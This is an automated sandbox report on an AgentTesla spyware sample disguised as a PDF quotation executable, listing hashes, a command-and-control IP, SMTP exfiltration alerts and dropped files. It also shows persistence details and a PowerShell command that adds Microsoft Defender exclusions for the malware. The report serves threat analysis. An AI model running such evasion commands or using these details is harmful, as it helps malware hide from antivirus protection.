                                                  http://www.founder.com.cn/cn/jBuUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251813901.000000000558B000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251689579.0000000005585000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251729621.0000000005587000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.sandoll.co.krimUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers8UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.tiro.comNormUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251813901.000000000558B000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251729621.0000000005587000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fontbureau.comalsUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.comalicUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.goodfont.co.krfk6UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.typography.netivUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248734873.0000000005584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257449014.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257348457.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cn#UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251459375.00000000055BD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251524303.00000000055BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.carterandcone.comn-uFiUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252757829.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      193.46.84.142
                                                      mail.bonsa.ltLithuania
                                                      43463BST-LTtrue
                                                      Joe Sandbox Version:35.0.0 Citrine
                                                      Analysis ID:652379
                                                      Start date and time: 26/06/202209:21:072022-06-26 09:21:07 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 9m 59s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:UN-Quotation 70000000187366444_PDF.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:35
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@12/11@1/1
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:
                                                      • Successful, ratio: 0.3% (good quality ratio 0.2%)
                                                      • Quality average: 52.2%
                                                      • Quality standard deviation: 35%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                      • Excluded IPs from analysis (whitelisted): 80.67.82.235, 80.67.82.211
                                                      • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      TimeTypeDescription
                                                      09:22:20API Interceptor659x Sleep call for process: UN-Quotation 70000000187366444_PDF.exe modified
                                                      09:22:27API Interceptor79x Sleep call for process: powershell.exe modified
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      Process:C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.355304211458859
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                      MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                      SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                      SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                      SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):22276
                                                      Entropy (8bit):5.600682201698306
                                                      Encrypted:false
                                                      SSDEEP:384:WtCDdq0j8fPbI09jjS0ngjultI+H7Y9gtSJ3xeT1MaXZlbAV7fWijiZBDI+iOY:2bIY/TgClthTtc8C+fwh2VM
                                                      MD5:E86FEA48F78C3AB4F664EDF0608FF92F
                                                      SHA1:D8F7C143950E9E374E82A874363975FEAA1429D1
                                                      SHA-256:70547AFAF743047D836C2EDFF9C72715CFB14421B4DFD1228EB69ADB5A0A3FFF
                                                      SHA-512:1B484CB88FC90CE043B6101284707F00BEA93FD096858E5E45E54D86CEFB75182AE4E5A3855AF5BB579F5EF1308984503E410E1107B06216888F7BEB37841D70
                                                      Malicious:false
                                                      Preview:@...e...........y.......h...I.@.=.....7...I..........@..........H...............<@.^.L."My...:X..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1593
                                                      Entropy (8bit):5.143309298274127
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtwVxvn:cge4MYrFdOFzOzN33ODOiDdKrsuTwrv
                                                      MD5:2AE384B6BD08DEB19652391B22018E51
                                                      SHA1:F875E428D15D7DEE9B22417379846830BE18CFEE
                                                      SHA-256:841042492DDC076CBAC48A79F1CD463FC9870BB4F24941E12A1203CB16A8E57F
                                                      SHA-512:33D3D623978F18D65A96C4DD940513289DC8056FAD4D7AD2D8CE5BD6D254406D6B6DA155A61AD36C32100906135B1E33F72DDA318B3174A1E2AE971493EC1183
                                                      Malicious:true
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                                      Process:C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):625152
                                                      Entropy (8bit):7.805349083482096
                                                      Encrypted:false
                                                      SSDEEP:12288:ovHH2iNDkPRxliW1QqaqYfTY0U0k6QDdWl0KZDHQGET1t1XGOgSCMVNQ:k1pkPRrhwfTY9jBW9AZXWvSCMVNQ
                                                      MD5:0BFB0AB1E8C7EC929E44D70C196B4D21
                                                      SHA1:89C971AE9A832CDFE2E56E8ADFE9972505059C2C
                                                      SHA-256:CAE7DB67AE977F3F41349954ECEDD51D0248924012FBCB33610E44CED5F24611
                                                      SHA-512:F72F7217E75EA998167CBB70DF95926856B7C0DC2BDACB044D5E8DF16381CA05E740D71CDA374567B7AB6DCC9F4427D5B1BF5B96E1C6F737CE44708C3DDABE6C
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 20%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b..............0..F...B.......e... ........@.. ....................................@..................................e..K.......t?........................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc...t?.......@...H..............@..@.reloc..............................@..B.................e......H.......|....=......^...<...M............................................0..........+.(..aS(....8.....#..V.-..?}....8.....#..(\..?}....8.....#....@..@}....8.....#X9..v..?}....8.....#.p=...P@}....8.....(.... .....:....&8....8v.......E........8......*...0..........+.(..$_8........E....S...%...8N......Z.. ....(....:....& ....8......#......D@Z.#.......?Z.#......D@YZX..8@.....*8.... ....(....9....&8......9....8......#......D@.......8....8....8......0..$.......+.(.].V...{....Z..8.
                                                      Process:C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):5773
                                                      Entropy (8bit):5.404171858036157
                                                      Encrypted:false
                                                      SSDEEP:96:BZNhKNdAqDo1ZV1ZMhKNdAqDo1Z8vd3jZMLhKNdAqDo1ZO6nnvZA:j
                                                      MD5:D5B13AAFFF1D8A6E7B1B3A8C47DC4FBD
                                                      SHA1:3E3B7108F50289B81F4CFFA2E7FB8A8A00F99A06
                                                      SHA-256:A686F3F41746F652FD0EAACBC43A64CB90CE0D5835B37FE548885D8C33E463E6
                                                      SHA-512:E8F0C303DE0CFE99A04A9F8066DAEDC37FF442C72F49F866E4690AB8BEA6965EEFAF64CFAF0625F8628A5B0B74E6A923238ED1834552ECB2E07028D2610605FC
                                                      Malicious:false
                                                      Preview:.**********************..Windows PowerShell transcript start..Start time: 20220626092228..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 377142 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\XrgnLg.exe..Process ID: 6712..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220626092228..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\XrgnLg.exe..**********************..Windows PowerShell transcript start..Start time: 20220626092650..Username: computer\user..RunAs User: computer\user..Confi
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):3643
                                                      Entropy (8bit):5.382961319466384
                                                      Encrypted:false
                                                      SSDEEP:96:BZXhKNJRbqDo1Z/RCDIZBhKNJRbqDo1Z5qDcD0RD0cD0RD0cD0RD0ZZu:nYyononol
                                                      MD5:3BACB553A7A293802400703686AC82B4
                                                      SHA1:7DBE2D86F2C0B0E7FBEDC6FCB0A374B4EFF987AD
                                                      SHA-256:80B8C4A90450CB5BFCC2C3DEF130735A6C502819494E0BE57E5F327B36DFA0BD
                                                      SHA-512:C37AD4F0C1F02290265B81C57012898FAB732A6537B3845B220DDB59EE2B0349FF7EEDC0CE459871686FEA73D54A0C43910974D749F4282A772F0590F1CB82AB
                                                      Malicious:false
                                                      Preview:.**********************..Windows PowerShell transcript start..Start time: 20220626092226..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 377142 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe..Process ID: 6608..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220626092226..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe..**********************..Command start time: 20220626092534..**********************..PS>TerminatingError(Add-MpPreference):
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.805349083482096
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      File name:UN-Quotation 70000000187366444_PDF.exe
                                                      File size:625152
                                                      MD5:0bfb0ab1e8c7ec929e44d70c196b4d21
                                                      SHA1:89c971ae9a832cdfe2e56e8adfe9972505059c2c
                                                      SHA256:cae7db67ae977f3f41349954ecedd51d0248924012fbcb33610e44ced5f24611
                                                      SHA512:f72f7217e75ea998167cbb70df95926856b7c0dc2bdacb044d5e8df16381ca05e740d71cda374567b7ab6dcc9f4427d5b1bf5b96e1c6f737ce44708c3ddabe6c
                                                      SSDEEP:12288:ovHH2iNDkPRxliW1QqaqYfTY0U0k6QDdWl0KZDHQGET1t1XGOgSCMVNQ:k1pkPRrhwfTY9jBW9AZXWvSCMVNQ
                                                      TLSH:37D4F145F396499DC043127598D9C368222AB387116EC2C679FB321ADD3E3EB53A2F47
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............0..F...B.......e... ........@.. ....................................@................................
                                                      Icon Hash:6aca8ae6e0fcc6d2
                                                      Entrypoint:0x4965de
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x62B7DF14 [Sun Jun 26 04:22:44 2022 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x965900x4b.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x980000x3f74.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x9c0000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x945e40x94600False0.8827993365627632data7.847857536771399IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x980000x3f740x4000False0.15765380859375data3.6117029811673764IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x9c0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountry
                                                      RT_ICON0x981480x468GLS_BINARY_LSB_FIRST
                                                      RT_ICON0x985b00x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 16485773, next used block 16420494
                                                      RT_ICON0x996580x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                      RT_GROUP_ICON0x9bc000x30data
                                                      RT_VERSION0x9bc300x344data
                                                      DLLImport
                                                      mscoree.dll_CorExeMain
                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      192.168.2.3193.46.84.142497415872840032 06/26/22-09:22:47.581294TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249741587192.168.2.3193.46.84.142
                                                      192.168.2.3193.46.84.142497415872030171 06/26/22-09:22:47.581243TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49741587192.168.2.3193.46.84.142
                                                      192.168.2.3193.46.84.142497415872851779 06/26/22-09:22:47.581294TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49741587192.168.2.3193.46.84.142
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jun 26, 2022 09:22:44.188890934 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:44.237401962 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:44.237498045 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.228558064 CEST58749741193.46.84.142192.168.2.3
